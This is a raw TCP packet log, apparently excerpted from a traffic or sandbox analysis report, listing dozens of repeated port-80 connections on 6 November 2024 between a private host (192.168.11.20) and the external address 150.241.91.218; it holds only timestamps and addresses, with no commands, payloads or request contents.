                                                                                                                                                              Nov 6, 2024 17:38:34.906452894 CET5013180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:35.111728907 CET8050131150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:35.111745119 CET8050131150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:35.178683043 CET8050131150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:35.195594072 CET5013180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:35.196177006 CET5013280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:35.387928009 CET8050131150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:35.387942076 CET8050132150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:35.388282061 CET5013180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:35.388292074 CET5013280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:35.388391018 CET5013280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:35.388391018 CET5013280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:35.579057932 CET8050132150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:35.579070091 CET8050132150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:35.647461891 CET8050132150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:35.663661957 CET5013280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:35.664258003 CET5013380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:35.858971119 CET8050132150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:35.859040976 CET8050133150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:35.859208107 CET5013280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:35.859280109 CET5013380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:35.859405041 CET5013380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:35.859405041 CET5013380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:36.047506094 CET8050133150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:36.047564983 CET8050133150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:36.127218008 CET8050133150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:36.147568941 CET5013380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:36.148406982 CET5013480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:36.338807106 CET8050134150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:36.338915110 CET8050133150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:36.339123964 CET5013480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:36.339126110 CET5013380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:36.339287043 CET5013480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:36.339287043 CET5013480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:36.527515888 CET8050134150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:36.527534962 CET8050134150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:36.598022938 CET8050134150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:36.614792109 CET5013480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:36.615317106 CET5013580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:36.803095102 CET8050134150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:36.803116083 CET8050135150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:36.803319931 CET5013480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:36.803319931 CET5013580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:36.803400993 CET5013580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:36.803400993 CET5013580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:36.991548061 CET8050135150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:36.991604090 CET8050135150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:37.061786890 CET8050135150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:37.072268963 CET5013580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:37.072709084 CET5013680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:37.267966986 CET8050136150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:37.267978907 CET8050135150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:37.268210888 CET5013580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:37.268218994 CET5013680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:37.268376112 CET5013680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:37.268376112 CET5013680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:37.457941055 CET8050136150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:37.457951069 CET8050136150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:37.526942968 CET8050136150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:37.558295012 CET5013680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:37.558763027 CET5013780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:37.746099949 CET8050136150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:37.746416092 CET5013680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:37.746925116 CET8050137150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:37.747256994 CET5013780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:37.747353077 CET5013780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:37.747353077 CET5013780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:37.936947107 CET8050137150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:37.937000990 CET8050137150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:38.007419109 CET8050137150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:38.018759966 CET5013780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:38.019292116 CET5013880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:38.207611084 CET8050137150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:38.207840919 CET8050138150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:38.207865000 CET5013780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:38.208005905 CET5013880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:38.208179951 CET5013880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:38.208179951 CET5013880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:38.405127048 CET8050138150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:38.405170918 CET8050138150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:38.466104984 CET8050138150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:38.480086088 CET5013880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:38.480545044 CET5013980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:38.670356989 CET8050138150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:38.670417070 CET8050139150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:38.670583010 CET5013880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:38.670583010 CET5013980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:38.670751095 CET5013980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:38.670751095 CET5013980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:38.858999014 CET8050139150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:38.859014988 CET8050139150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:38.933762074 CET8050139150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:38.948307037 CET5013980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:38.948916912 CET5014080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:39.137343884 CET8050139150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:39.137664080 CET5013980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:39.143222094 CET8050140150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:39.143589020 CET5014080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:39.143676996 CET5014080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:39.143676996 CET5014080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:39.335335016 CET8050140150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:39.337173939 CET8050140150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:39.404056072 CET8050140150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:39.421952963 CET5014080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:39.422616005 CET5014180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:39.616539001 CET8050141150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:39.616658926 CET8050140150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:39.616791010 CET5014180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:39.616858959 CET5014080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:39.616962910 CET5014180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:39.616962910 CET5014180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:39.804964066 CET8050141150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:39.805073023 CET8050141150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:39.876351118 CET8050141150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:39.888571024 CET5014180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:39.889115095 CET5014280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:40.077858925 CET8050141150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:40.078082085 CET5014180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:40.078830957 CET8050142150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:40.079129934 CET5014280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:40.079261065 CET5014280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:40.079358101 CET5014280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:40.269056082 CET8050142150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:40.269066095 CET8050142150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:40.630428076 CET8050142150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:40.653465033 CET5014280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:40.653894901 CET5014380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:40.842854977 CET8050142150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:40.842868090 CET8050143150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:40.843224049 CET5014280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:40.843224049 CET5014380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:40.843312025 CET5014380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:40.843312025 CET5014380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:41.033365965 CET8050143150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:41.033376932 CET8050143150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:41.107615948 CET8050143150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:41.120640993 CET5014380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:41.121294022 CET5014480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:41.325509071 CET8050144150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:41.325519085 CET8050143150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:41.325767040 CET5014380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:41.325782061 CET5014480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:41.325884104 CET5014480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:41.325884104 CET5014480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:41.513657093 CET8050144150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:41.513672113 CET8050144150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:41.585341930 CET8050144150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:41.597300053 CET5014480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:41.597733021 CET5014580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:41.791843891 CET8050145150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:41.791856050 CET8050144150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:41.792144060 CET5014480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:41.792144060 CET5014580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:41.792283058 CET5014580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:41.792284012 CET5014580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:41.984576941 CET8050145150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:41.984590054 CET8050145150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:42.052782059 CET8050145150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:42.066497087 CET5014580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:42.066941977 CET5014680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:42.254627943 CET8050145150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:42.254638910 CET8050146150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:42.254780054 CET5014580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:42.254791975 CET5014680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:42.254951954 CET5014680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:42.254976034 CET5014680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:42.445760965 CET8050146150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:42.445774078 CET8050146150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:42.510999918 CET8050146150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:42.524723053 CET5014680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:42.525728941 CET5014780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:42.712542057 CET8050146150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:42.712811947 CET5014680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:42.713491917 CET8050147150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:42.713854074 CET5014780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:42.714003086 CET5014780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:42.714003086 CET5014780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:42.905894041 CET8050147150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:42.905950069 CET8050147150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:42.969136000 CET8050147150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:42.988518953 CET5014780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:42.989263058 CET5014880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:43.176680088 CET8050147150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:43.176882029 CET5014780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:43.177355051 CET8050148150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:43.177587032 CET5014880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:43.177690029 CET5014880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:43.177690029 CET5014880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:43.365350962 CET8050148150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:43.365403891 CET8050148150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:43.437114000 CET8050148150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:43.458666086 CET5014880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:43.459119081 CET5014980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:43.647082090 CET8050148150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:43.647310972 CET5014880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:43.647605896 CET8050149150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:43.647835970 CET5014980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:43.647895098 CET5014980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:43.647895098 CET5014980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:43.836281061 CET8050149150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:43.836337090 CET8050149150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:43.903465033 CET8050149150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:43.914194107 CET5014980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:43.914964914 CET5015080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:44.108325005 CET8050150150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:44.108365059 CET8050149150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:44.108606100 CET5014980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:44.108664036 CET5015080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:44.108788967 CET5015080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:44.108788967 CET5015080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:44.301397085 CET8050150150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:44.301435947 CET8050150150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:44.461783886 CET8050150150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:44.479160070 CET5015080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:44.479825974 CET5015180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:44.667181969 CET8050150150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:44.667419910 CET5015080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:44.667834997 CET8050151150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:44.668138981 CET5015180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:44.668256044 CET5015180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:44.668256044 CET5015180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:44.856337070 CET8050151150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:44.856401920 CET8050151150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:44.931461096 CET8050151150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:44.949451923 CET5015180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:44.949898005 CET5015280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:45.138322115 CET8050152150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:45.138617039 CET5015280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:45.138696909 CET5015280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:45.138696909 CET5015280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:45.138703108 CET8050151150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:45.138873100 CET5015180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:45.328586102 CET8050152150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:45.328644991 CET8050152150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:45.391675949 CET8050152150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:45.437257051 CET5015280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:45.579161882 CET5015280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:45.580737114 CET5015380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:45.774811029 CET8050152150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:45.774872065 CET8050153150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:45.774959087 CET5015280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:45.775230885 CET5015380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:45.775355101 CET5015380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:45.775355101 CET5015380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:45.963402033 CET8050153150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:45.963454962 CET8050153150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:46.124140978 CET8050153150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:46.141026974 CET5015380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:46.141577959 CET5015480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:46.336451054 CET8050154150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:46.336462975 CET8050153150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:46.336724997 CET5015480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:46.336724997 CET5015380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:46.336795092 CET5015480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:46.336795092 CET5015480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:46.528213024 CET8050154150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:46.528229952 CET8050154150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:46.592243910 CET8050154150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:46.604239941 CET5015480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:46.604865074 CET5015580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:46.799695969 CET8050155150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:46.799741030 CET8050154150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:46.799912930 CET5015480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:46.799912930 CET5015580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:46.800075054 CET5015580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:46.800170898 CET5015580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:46.991180897 CET8050155150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:46.991221905 CET8050155150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:47.055814981 CET8050155150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:47.067874908 CET5015580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:47.068526030 CET5015680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:47.256602049 CET8050155150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:47.256609917 CET8050156150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:47.256841898 CET5015680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:47.256841898 CET5015580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:47.256962061 CET5015680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:47.256962061 CET5015680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:47.445846081 CET8050156150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:47.445858002 CET8050156150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:47.516885996 CET8050156150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:47.528561115 CET5015680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:47.529505014 CET5015780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:47.717089891 CET8050156150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:47.717295885 CET5015680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:47.717803001 CET8050157150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:47.718004942 CET5015780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:47.718312025 CET5015780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:47.718368053 CET5015780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:47.907299995 CET8050157150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:47.907341957 CET8050157150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:47.977457047 CET8050157150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:48.030263901 CET5015780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:48.155683041 CET5015780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:48.156315088 CET5015880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:48.344058990 CET8050157150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:48.344207048 CET5015780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:48.345701933 CET8050158150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:48.345942020 CET5015880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:48.346086025 CET5015880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:48.346086025 CET5015880192.168.11.20150.241.91.218
